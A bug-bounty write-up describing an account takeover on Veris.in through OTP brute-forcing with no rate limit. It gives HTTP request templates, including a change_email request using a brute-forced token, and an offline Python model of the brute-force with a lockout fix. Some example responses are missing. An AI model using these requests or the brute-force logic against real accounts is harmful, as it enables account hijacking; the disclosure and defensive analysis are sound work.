Veris.in Account Takeover

Hey Guys! Today I'll share my account takeover finding on Veris.in, so without wasting any more time, let's start.



I installed the Android app of Veris and started testing it. In the Veris app we first need to verify our phone number, and only then can we register. While doing this I captured the request and tried to brute-force the OTP, and noticed that there was no rate limiting, so I could attach anyone's number to my account. I reported it, but that was not a big deal. Then I kept testing, and after trying many things I noticed that every request had this kind of structure:

POST /api/v1/*Any Functionality*/ HTTP/1.1
Authorization: token b910cxxx2ac02f3a8xxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

What I noticed is that there is no user session as such; everything works on a token (in the Authorization header), which authorizes the client to Veris' API. But then I thought, "where did it come from? I never entered any password." And then it hit me: "Oh, I entered a One Time Password."

So what happens here is: when we enter a number, the app sends an OTP to it. After the OTP is verified, the server generates a token that authenticates us to the API and checks whether the number matches any account in the database; if it does, we are logged into that account. Now, as I mentioned earlier, there is no rate limit on the OTP. So I can request an OTP for your number, brute-force it to get a token for your account, and boom: I can use that token to modify the information on your account. For example:

POST /api/v1/change_email/ HTTP/1.1
Authorization: token **BRUTEFORCED TOKEN GOES HERE**
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

{"email":"hacker@hack.com"}

If the number is NOT registered, the response looks like this one (token generated):

If the number is registered, the response looks like this one (token generated):
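To make the chain concrete, here is a small offline model of the flow, written as an added example for this page (it is not Veris' code and not the author's): an OTP server that issues an API token bound to a phone number, a brute-force client that walks the whole OTP space, and the same attack run against a server that invalidates the OTP after five wrong guesses. The OTP length (4 digits), the five-attempt lockout, the endpoint names and the phone number are all assumptions. It also covers the two response cases above: a token is issued whether or not the number is registered, but only a registered number has an account to modify.

```python
import hmac
import secrets

# Assumption: the post never states the OTP length; 4 digits is used here.
OTP_DIGITS = 4
OTP_SPACE = 10 ** OTP_DIGITS


class FixedRng:
    """Deterministic stand-in for the RNG so the demo (and test) are reproducible."""

    def __init__(self, value):
        self.value = value

    def randrange(self, n):
        return self.value % n


class OtpServer:
    """Toy model of the phone-number OTP login described in the post.

    max_attempts=None reproduces the vulnerable behaviour (no limit on wrong
    guesses); a small integer kills the OTP after that many failures.
    Hypothetical model, not Veris' implementation.
    """

    def __init__(self, max_attempts=None, rng=None):
        self.max_attempts = max_attempts
        self.rng = rng or secrets.SystemRandom()
        self.pending = {}   # phone -> [otp, failed_attempts]
        self.accounts = {}  # phone -> {"email": ...}
        self.tokens = {}    # API token -> phone it was issued for

    def send_otp(self, phone):
        """Hypothetical 'verify number' endpoint: generate an OTP and 'SMS' it."""
        otp = f"{self.rng.randrange(OTP_SPACE):0{OTP_DIGITS}d}"
        self.pending[phone] = [otp, 0]

    def verify_otp(self, phone, guess):
        """Hypothetical 'verify OTP' endpoint: API token on a correct guess, else None."""
        entry = self.pending.get(phone)
        if entry is None:
            return None
        if self.max_attempts is not None and entry[1] >= self.max_attempts:
            return None  # locked out: this OTP is dead, a fresh one must be requested
        if not hmac.compare_digest(entry[0], guess):
            entry[1] += 1
            return None
        del self.pending[phone]  # an OTP is single-use
        token = secrets.token_hex(20)  # same shape as the 40-hex-char token in the post
        self.tokens[token] = phone     # token is bound to the number, not to a password
        return token

    def change_email(self, token, new_email):
        """Models POST /api/v1/change_email/ with 'Authorization: token <token>'."""
        phone = self.tokens.get(token)
        if phone is None or phone not in self.accounts:
            return False  # valid token but no account behind the number: nothing to edit
        self.accounts[phone]["email"] = new_email
        return True


def brute_force_otp(server, victim_phone):
    """Attacker: trigger an OTP for the victim's number, then try every value in order.

    Returns (token, attempts_used); token is None if the space is exhausted or the
    server has locked the OTP.
    """
    server.send_otp(victim_phone)
    for guess in range(OTP_SPACE):
        token = server.verify_otp(victim_phone, f"{guess:0{OTP_DIGITS}d}")
        if token is not None:
            return token, guess + 1
    return None, OTP_SPACE


def takeover(server, victim_phone, attacker_email):
    """Full chain from the post: brute-force the OTP, then use the token on the account."""
    token, attempts = brute_force_otp(server, victim_phone)
    changed = token is not None and server.change_email(token, attacker_email)
    return changed, attempts


if __name__ == "__main__":
    victim = "+910000000000"  # constructed sample number

    vulnerable = OtpServer(rng=FixedRng(4321))
    vulnerable.accounts[victim] = {"email": "victim@example.com"}
    print("no rate limit:", takeover(vulnerable, victim, "hacker@hack.com"))

    hardened = OtpServer(max_attempts=5, rng=FixedRng(4321))
    hardened.accounts[victim] = {"email": "victim@example.com"}
    print("5-attempt lockout:", takeover(hardened, victim, "hacker@hack.com"))
```

The point of the hardened variant is that the brute force is not merely slowed down but made pointless: once the OTP is invalidated after a handful of failures, the attacker has to trigger a new OTP (which the victim receives) and starts over against a freshly random value, so the expected number of OTP requests before success is in the thousands rather than one.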

Video Proof of Concept